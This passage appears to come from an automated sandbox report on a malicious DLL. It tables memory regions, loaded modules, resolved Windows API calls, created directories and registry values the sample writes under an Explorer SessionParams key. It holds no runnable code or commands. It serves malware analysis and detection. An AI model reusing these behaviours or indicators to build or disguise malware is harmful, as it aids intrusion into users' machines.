- |
| kernel32.dll | 0x761d0000 | 0x762a3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x762b0000 | 0x762cefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x762d0000 | 0x762d5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x762e0000 | 0x762f8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x76300000 | 0x76356fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x765f0000 | 0x765f9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x76700000 | 0x7679ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x767a0000 | 0x773e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x773f0000 | 0x7748cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x77510000 | 0x77544fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x77550000 | 0x775f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x77720000 | 0x777cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x77970000 | 0x77acbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x77ad0000 | 0x77b98fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x77ba0000 | 0x77c6bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x77c80000 | 0x77ccdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| apisetschema.dll | 0x77e80000 | 0x77e80fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x77ec0000 | 0x77ffbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007ffd6000 | 0x7ffd6000 | 0x7ffd6fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | Readable, Writable |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\win.com | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\system32\kernel32.dll | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP | - |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP\system32\ | - |
|
1 | |
| Get Info | C:\Windows\system32\win.com | type = time |
|
1 | |
| Get Info | C:\Windows\system32\kernel32.dll | type = time |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 |
Module (101)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | kernel32.dll | base_address = 0x761d0000 |
|
2 | |
| Load | ws2_32.dll | base_address = 0x77510000 |
|
1 | |
| Load | advapi32.dll | base_address = 0x76700000 |
|
1 | |
| Load | msvcrt.dll | base_address = 0x77720000 |
|
1 | |
| Load | user32.dll | base_address = 0x77ad0000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x761d0000 |
|
12 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Windows\System32\goRcteXxZX.exe, size = 260 |
|
6 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Users\EEBsYm5\Desktop\97328F~1.DLL, size = 260 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsAlloc, address_out = 0x7622418d |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsGetValue, address_out = 0x76221e16 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsSetValue, address_out = 0x762276e6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsFree, address_out = 0x76221f61 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = EncodePointer, address_out = 0x77f1a295 |
|
8 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DecodePointer, address_out = 0x77f1cd10 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x762276b5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetProcAddress, address_out = 0x762233d3 |
|
2 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSAStartup, address_out = 0x77513ab2 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSACleanup, address_out = 0x77513c5f |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = gethostbyname, address_out = 0x77527673 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = inet_ntoa, address_out = 0x7751b131 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateFileA, address_out = 0x7621cee8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WriteFile, address_out = 0x76221400 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseHandle, address_out = 0x7621ca7c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindFirstFileA, address_out = 0x76222d89 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindNextFileA, address_out = 0x7621a187 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindClose, address_out = 0x76220e62 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DeleteFileA, address_out = 0x762147cb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FileTimeToSystemTime, address_out = 0x76221dfe |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFilePointer, address_out = 0x7621db36 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateProcessA, address_out = 0x761d2082 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WaitForSingleObject, address_out = 0x7621ba90 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ReadFile, address_out = 0x762196fb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateEventW, address_out = 0x76223386 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemDirectoryA, address_out = 0x76218fc5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetWindowsDirectoryW, address_out = 0x762104b6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathA, address_out = 0x76236a65 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathW, address_out = 0x76208b33 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLocalTime, address_out = 0x7621a90e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetComputerNameW, address_out = 0x762103ff |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemInfo, address_out = 0x76223728 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetVersionExW, address_out = 0x76213b1a |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetEnvironmentVariableA, address_out = 0x7621ce2e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileA, address_out = 0x7623532c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLastError, address_out = 0x7621bf00 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFileAttributesA, address_out = 0x76208cb9 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileSize, address_out = 0x76210273 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateDirectoryA, address_out = 0x762368da |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = TerminateProcess, address_out = 0x76212331 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryW, address_out = 0x76223c01 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryA, address_out = 0x7622395c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = MultiByteToWideChar, address_out = 0x7622452b |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCreateKeyExA, address_out = 0x76711469 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegEnumValueA, address_out = 0x7670cf49 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegDeleteValueA, address_out = 0x7672a4ea |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCloseKey, address_out = 0x7671469d |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memset, address_out = 0x77729790 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcpy, address_out = 0x77729910 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcmp, address_out = 0x77737975 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = malloc, address_out = 0x77729cee |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = free, address_out = 0x77729894 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strchr, address_out = 0x7772dbeb |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncpy, address_out = 0x777308a9 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = atoi, address_out = 0x7772dbe0 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snwprintf, address_out = 0x777495d1 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncat, address_out = 0x77750909 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strstr, address_out = 0x7772de4a |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strlen, address_out = 0x777343d3 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strrchr, address_out = 0x7772dbae |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snprintf, address_out = 0x7774fa7c |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = OemToCharA, address_out = 0x77b2f041 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfA, address_out = 0x77ae3f47 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfW, address_out = 0x77af426d |
|
1 |
System (5)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-04-29 13:06:26 (UTC) |
|
2 | |
| Get Time | type = Ticks, time = 96268 |
|
1 | |
| Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
2 |
Environment (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 | |
| Get Environment String | name = APPDATA, result_out = C:\Users\EEBsYm5\AppData\Roaming |
|
2 |
Process #35: gorctexxzx.exe
150
0
| Information | Value |
|---|---|
| ID | #35 |
| File Name | c:\windows\system32\gorctexxzx.exe |
| Command Line | "C:\Windows\System32\goRcteXxZX.exe" /dll="C:\Users\EEBsYm5\Desktop\97328F~1.DLL" /fn_id=AddAtomT /fn_args="DefaultInstall" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:33, Reason: Child Process |
| Unmonitor | End Time: 00:02:29, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:56 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xc08 |
| Parent PID | 0xa3c (c:\windows\system32\gorctexxzx.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | CRH2YWU7\EEBsYm5 |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
C0C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x00000000000c0000 | 0x000c0000 | 0x000c0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000000e0000 | 0x000e0000 | 0x000effff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000000f0000 | 0x000f0000 | 0x001effff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000002a0000 | 0x002a0000 | 0x0039ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000003a0000 | 0x003a0000 | 0x00467fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000470000 | 0x00470000 | 0x00570fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000580000 | 0x00580000 | 0x0117ffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| gorctexxzx.exe | 0x011d0000 | 0x011f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000001200000 | 0x01200000 | 0x0137ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001380000 | 0x01380000 | 0x0152ffff | Private Memory | Readable, Writable |
|
|
|
- |
| api-ms-win-core-synch-l1-2-0.dll | 0x72db0000 | 0x72db2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| 97328f~1.dll | 0x72ee0000 | 0x72f24fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x75f70000 | 0x75fb9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x761d0000 | 0x762a3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x762b0000 | 0x762cefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x762d0000 | 0x762d5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x762e0000 | 0x762f8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x76300000 | 0x76356fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x765f0000 | 0x765f9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x76700000 | 0x7679ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x767a0000 | 0x773e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x773f0000 | 0x7748cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x77510000 | 0x77544fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x77550000 | 0x775f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x77720000 | 0x777cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x77970000 | 0x77acbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x77ad0000 | 0x77b98fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x77ba0000 | 0x77c6bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x77c80000 | 0x77ccdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| apisetschema.dll | 0x77e80000 | 0x77e80fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x77ec0000 | 0x77ffbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | Readable, Writable |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\win.com | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\system32\kernel32.dll | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP | - |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP\system32\ | - |
|
1 | |
| Get Info | C:\Windows\system32\win.com | type = time |
|
1 | |
| Get Info | C:\Windows\system32\kernel32.dll | type = time |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 |
Registry (32)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | - |
|
1 | |
| Create Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | - |
|
6 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = Timout, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = IsActive, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = BSlp, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = SDCnt, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = LastValue, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = Id, type = REG_BINARY |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = StVal, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = EmtParam, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = HtParam, data = 3600, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = CMValue, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = ILevelCount, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = IListLen, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = IList, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = Installed, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = IPlace, type = REG_BINARY |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = ISFValue, type = REG_BINARY |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = LastId, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = NTries, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = IMValue, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = LCValue, data = 0, type = REG_NONE |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = HtParam, data = 7200, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = StVal, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = CMValue, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = ILevelCount, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = IPlace, size = 100, type = REG_BINARY |
|
1 |
Module (101)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | kernel32.dll | base_address = 0x761d0000 |
|
2 | |
| Load | ws2_32.dll | base_address = 0x77510000 |
|
1 | |
| Load | advapi32.dll | base_address = 0x76700000 |
|
1 | |
| Load | msvcrt.dll | base_address = 0x77720000 |
|
1 | |
| Load | user32.dll | base_address = 0x77ad0000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x761d0000 |
|
12 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Windows\System32\goRcteXxZX.exe, size = 260 |
|
6 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Users\EEBsYm5\Desktop\97328F~1.DLL, size = 260 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsAlloc, address_out = 0x7622418d |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsGetValue, address_out = 0x76221e16 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsSetValue, address_out = 0x762276e6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsFree, address_out = 0x76221f61 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = EncodePointer, address_out = 0x77f1a295 |
|
8 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DecodePointer, address_out = 0x77f1cd10 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x762276b5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetProcAddress, address_out = 0x762233d3 |
|
2 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSAStartup, address_out = 0x77513ab2 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSACleanup, address_out = 0x77513c5f |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = gethostbyname, address_out = 0x77527673 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = inet_ntoa, address_out = 0x7751b131 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateFileA, address_out = 0x7621cee8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WriteFile, address_out = 0x76221400 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseHandle, address_out = 0x7621ca7c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindFirstFileA, address_out = 0x76222d89 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindNextFileA, address_out = 0x7621a187 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindClose, address_out = 0x76220e62 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DeleteFileA, address_out = 0x762147cb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FileTimeToSystemTime, address_out = 0x76221dfe |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFilePointer, address_out = 0x7621db36 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateProcessA, address_out = 0x761d2082 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WaitForSingleObject, address_out = 0x7621ba90 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ReadFile, address_out = 0x762196fb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateEventW, address_out = 0x76223386 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemDirectoryA, address_out = 0x76218fc5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetWindowsDirectoryW, address_out = 0x762104b6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathA, address_out = 0x76236a65 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathW, address_out = 0x76208b33 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLocalTime, address_out = 0x7621a90e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetComputerNameW, address_out = 0x762103ff |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemInfo, address_out = 0x76223728 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetVersionExW, address_out = 0x76213b1a |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetEnvironmentVariableA, address_out = 0x7621ce2e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileA, address_out = 0x7623532c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLastError, address_out = 0x7621bf00 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFileAttributesA, address_out = 0x76208cb9 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileSize, address_out = 0x76210273 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateDirectoryA, address_out = 0x762368da |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = TerminateProcess, address_out = 0x76212331 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryW, address_out = 0x76223c01 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryA, address_out = 0x7622395c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = MultiByteToWideChar, address_out = 0x7622452b |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCreateKeyExA, address_out = 0x76711469 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegEnumValueA, address_out = 0x7670cf49 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegDeleteValueA, address_out = 0x7672a4ea |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCloseKey, address_out = 0x7671469d |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memset, address_out = 0x77729790 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcpy, address_out = 0x77729910 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcmp, address_out = 0x77737975 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = malloc, address_out = 0x77729cee |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = free, address_out = 0x77729894 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strchr, address_out = 0x7772dbeb |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncpy, address_out = 0x777308a9 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = atoi, address_out = 0x7772dbe0 |
|
1 | |
